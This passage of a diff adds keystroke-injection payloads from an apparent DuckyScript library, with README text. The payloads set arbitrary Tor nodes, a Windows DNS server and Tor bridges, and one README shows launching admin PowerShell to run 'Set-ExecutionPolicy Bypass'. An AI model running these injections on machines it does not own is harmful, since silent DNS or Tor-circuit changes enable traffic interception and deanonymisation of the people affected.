+   - For users in regions with restricted access to the Tor network, the `torrc` file allows the configuration of bridge relays. Bridge relays help users bypass censorship by providing an alternative entry point to the Tor network.
+
+4. **Hidden Service Configuration:**
+   - Users hosting Tor hidden services can configure their services through the `torrc` file. This includes defining the service's port, authentication methods, and other related parameters.
+
+5. **Logging and Debugging:**
+   - The file provides options for configuring logging levels and debugging information. Users can tailor the amount of detail Tor logs, facilitating troubleshooting and analysis.
+
+6. **Security Settings:**
+   - Various security-related options can be configured in the `torrc` file, such as restricting certain features or specifying the behavior of Tor in response to specific security events.
+
+7. **Network and Protocol Settings:**
+   - Users can fine-tune Tor's network and protocol settings in the `torrc` file, influencing aspects such as circuit creation, DNS resolution, and transport protocols.
+
+Customizing the `torrc` file allows users to tailor Tor's behavior to their specific needs and security requirements. However, users should exercise caution and adhere to Tor's best practices to ensure the continued effectiveness and anonymity of their Tor usage.
+
+> See the [sources](#sources) section for more on this topic.
+
+## Tor University Challenge by EFF
+
+*Off-Topic*
+
+![](https://www.eff.org/files/banner_library/banner-tor-monions.png)
+
+Tor is a valuable tool for browsing the web anonymously, but since it's powered by volunteers willing to share some bandwidth and a computer, it's always in need of additional help. Which is why EFF is announcing the Tor University Challenge, a project asking universities to start running Tor relays on campus. Today, we're launching with support from 12 universities. With your help, we can add more universities to strengthen the Tor network to improve one of the best free privacy tools available today.
+
+*Source: https://www.eff.org/deeplinks/2023/08/announcing-tor-university-challenge*
+
+> If you are interested in finding out more about Tor and EFF's initiative, you can learn more at the official page of [Tor University Challenge](https://toruniversity.eff.org/).
+
+## Sources
+
+2. Select the relays - https://metrics.torproject.org/rs.html
+3. torrc - https://support.torproject.org/glossary/torrc/
+4. Official torrc documentation and so on - https://2019.www.torproject.org/docs/tor-manual.html.en
+5. Tor University Challenge - https://toruniversity.eff.org/
+
+## Credits
+
+<h2 align="center"> Aleff</h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit-Windows/payload.txt

@@ -0,0 +1,63 @@
+REM ################################################################
+REM #                                                              |
+REM # Title        : Set An Arbitrary And Persistent Tor Circuit   |
+REM # Author       : Aleff                                         |
+REM # Version      : 1.0                                           |
+REM # Category     : Execution                                     |
+REM # Target       : Windows 10/11                                 |
+REM #                                                              |
+REM ################################################################
+
+REM Requirements:
+REM  - Tor installed
+REM  - Fingerprints of your relays
+
+REM Note:
+REM  - Payload tested using TorBrowser 13.0.8 based on Mozilla Firefoz 115.6.0esr ENG
+REM  - Payload tested on Windows 11_eng;
+
+REM Set the Fingerprints here
+DEFINE #EntryNode example
+DEFINE #MiddleNode example
+DEFINE #ExitNode example
+
+REM Do not change the variables that begin with 'const', they are constants that allow the nodes to be configured correctly.
+DEFINE #const_entry_node EntryNodes
+DEFINE #const_middle_node MiddleNodes
+DEFINE #const_exit_node ExitNodes
+
+DELAY 2000
+REM Open the TorBrowser path
+GUI
+DELAY 500
+STRINGLN tor browser
+RIGHTARROW
+DOWNARROW
+DOWNARROW
+ENTER
+SHIFT F10
+DELAY 500
+DOWNARROW
+DOWNARROW
+ENTER
+REM Search and open the torrc config file
+CTRL f
+DELAY 500
+STRING torrc
+DELAY 1500
+DOWNARROW
+SPACE
+ENTER
+TAB
+ENTER
+REM Delete all the previous data with the arbotrary nodes
+CTRL a
+DELETE
+STRINGLN_BLOCK
+    #const_entry_node #EntryNode
+    #const_middle_node #MiddleNode
+    #const_exit_node #ExitNode
+END_STRINGLN
+CTRL s
+ALT F4
+ALT F4

payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/README.md

@@ -0,0 +1,40 @@
+# Set An Arbitrary DNS (IPv4 version)
+
+This script can be used to change the default DNS server in Windows 11.
+
+**Category**: Execution
+
+## Description
+
+This script can be used to change the default DNS server in Windows 11.
+
+The script open the settings, then go to network settings, then go to wi-fi settings, then go to hardware properties settings, the open the dns settings, then change to manual, then set the DNS server defined before, then save the settings changed and close the window.
+
+- You must edit the DNS defining the IPv4 in the payload.txt file
+
+```DuckyScript
+REM DNS IPv4 like Cloudflare DNS 1.1.1.1
+DEFINE DNS example
+```
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt

@@ -0,0 +1,60 @@
+REM ########################################################
+REM #                                                      |
+REM # Title        : Set An Arbitrary DNS (IPv4 version)   |
+REM # Author       : Aleff                                 |
+REM # Version      : 1.0                                   |
+REM # Category     : Execution                             |
+REM # Target       : Windows 11                            |
+REM #                                                      |
+REM ########################################################
+
+
+REM Requirements:
+REM     - Nothing
+
+
+REM DNS IPv4 like Cloudflare DNS 1.1.1.1
+DEFINE DNS example
+
+
+DEFAULT_DELAY 500
+REM Open Settings
+GUI
+STRING settings
+ENTER
+
+REM Go to network settings
+REPEAT 3 DOWNARROW
+ENTER
+
+REM Go to Wi-Fi settings
+REPEAT 4 TAB
+ENTER
+
+REM Go to hardware properties settings
+REPEAT 16 TAB
+ENTER
+
+REM DNS Settings
+REPEAT 2 TAB
+ENTER
+
+REM Change to manual
+SPACE
+DOWNARROW
+ENTER
+
+REM Set the DNS server
+TAB
+SPACE
+TAB
+STRING DNS
+TAB
+ENTER
+
+REM Save settings
+DOWNARROW
+ENTER
+REPEAT 5 TAB
+ENTER
+ALT F4

payloads/library/execution/Set_Tor_Bridge_In_Windows/README.md

@@ -0,0 +1,79 @@
+# Set Tor Bridge in Windows
+
+Introducing the "Set Tor Bridge in Windows" payload a DuckyScript payload designed for O.MG. This versatile payload empowers users to manually configure Tor bridges, enabling the selection of any bridge of their choice. With the ease of customization, users can redefine their Tor experience by setting bridges in a way that suits their preferences. This payload not only provides flexibility but also enhances user control over their Tor network settings.
+
+> In Tor, a "bridge" is a server used as an intermediary to help users connect to the Tor network more securely and bypass any restrictions or censorship on accessing Tor. Bridges are often employed when direct access to Tor is blocked or monitored by a firewall or censorship system.
+>
+> Essentially, when using a bridge, the initial connection is made through the bridge instead of through a standard Tor entry node. This makes it more challenging for censors to identify and block Tor traffic, as the traffic through the bridge appears like regular, non-Tor traffic.
+>
+> Bridges can be manually configured in the Tor client settings, allowing users to overcome restrictions and access the Tor network in situations where it might otherwise be prevented.
+
+*Source: What is a bridge\[[1](#sources)]*
+
+**Category**: Execution
+
+## Index
+
+- [Set Tor Bridge in Windows](#set-tor-bridge-in-windows)
+- [Payload Description](#payload-description)
+- [Note](#note)
+- [Sources](#sources)
+- [Credits](#credits)
+
+## Payload Description
+
+The following DuckyScript payload is designed to execute a series of commands using the TorBrowser. It requires Tor to be installed before running. Here's a description of the payload's behavior:
+
+1. Opens the Start menu by pressing the GUI (Windows) key.
+2. Types "TorBrowser" and presses Enter to launch the TorBrowser.
+3. Executes a sequence of key presses to navigate in the browser:
+    
+   a. Presses ALT
+   
+   b. Then 2 times the Left Arrow to position yourself on the "Tools" item
+
+   c. Presses ENTER to open the menu
+
+   d. Up Arrow and ENTER to open the settings page
+
+   e. Write the contstant "Add a new Bridge" to search the bridge section
+   
+   f. Now the ALT TAB command combination is repeated 12 times. It is seemingly counterintuitive to go backwards, but this strategy allows the use of this payload to be generalized in that it does not change whether other active bridges are already present.
+   
+   h. Presses Enter to open the Manual Bridge area.
+5. Moves the cursor to the text area (TAB).
+6. Writes the contents of the variables #BRIDGE, #BRIDGE-N, multiple bridges can be entered.
+7. Saves the new settings and closes
+8. Closes the TorBrowser using the ALT F4 key combination.
+
+## Note
+
+- The payload is designed to run on a Windows system and requires Tor to be installed.
+- The variable #BRIDGE is defined at the beginning of the payload to allow the user to specify their own bridge.
+- Ensure that the key sequences are adapted to the specific version of the TorBrowser in use.
+
+## Sources
+
+1. What is a bridge? - https://support.torproject.org/censorship/censorship-7/
+
+## Credits
+
+<h2 align="center"> Aleff</h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt

@@ -0,0 +1,57 @@
+REM ###################################
+REM #                                 |
+REM # Title        : Set Tor Bridge   |
+REM # Author       : Aleff            |
+REM # Version      : 1.0              |
+REM # Category     : Execution        |
+REM # Target       : Windows 10/11    |
+REM #                                 |
+REM ###################################
+
+REM Requirements:
+REM     - Tor installed
+
+REM Note:
+REM     - Payload tested using TorBrowser 13.0.8 based on Mozilla Firefoz 115.6.0esr ENG
+
+REM Set your own bridge(s) here
+DEFINE #BRIDGE example
+DEFINE #BRIDGE-N example-n
+
+DELAY 2000
+GUI
+DELAY 500
+STRING tor browser
+ENTER
+DELAY 1000
+
+ALT
+
+REPEAT 2 LEFTARROW
+
+ENTER
+
+UPARROW
+
+ENTER
+
+DELAY 500
+
+STRING Add a new Bridge
+
+REPEAT 12 ALT TAB
+
+ENTER
+
+TAB
+
+STRINGLN #BRIDGE
+STRINGLN #BRIDGE-N
+
+TAB
+
+ENTER
+
+DELAY 500
+
+ALT F4

payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/README.md

@@ -0,0 +1,52 @@
+# Starting a PowerShell with administrator permissions in Windows 10/11
+
+This script can be considered by people who are new to the world of scripts written in DuckyScript so that they can understand how to start a PowerShell with administrator permissions on a Windows machine.
+
+**Category**: Execution
+
+## Description
+
+This script can be considered by people who are new to the world of scripts written in DuckyScript so that they can understand how to start a PowerShell with administrator permissions on a Windows machine.
+
+Starting a PowerShell session with administrator privileges means the session has access to features and operations that require high permissions on the Windows operating system.
+
+Some PowerShell commands require administrator privileges to run properly. Starting PowerShell as an administrator allows you to execute commands that require elevated permissions, such as managing system services, changing security settings, creating or modifying user accounts, installing system-level software, and so on.
+
+It is important to note that running PowerShell with administrator privileges involves a higher level of responsibility and can cause significant changes to the system. Therefore, it is advisable to be careful and fully understand the effects of operations performed in a session with administrator privileges to avoid unwanted or harmful changes.
+
+## Dependencies
+
+* Nothing
+
+## Example
+
+- `STRINGLN Get-ExecutionPolicy -List`
+![](docs/1.png)
+
+- `STRINGLN Set-ExecutionPolicy Bypass`
+![](docs/2.png)
+
+- `STRINGLN Get-ExecutionPolicy -List`
+![](docs/3.png)
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>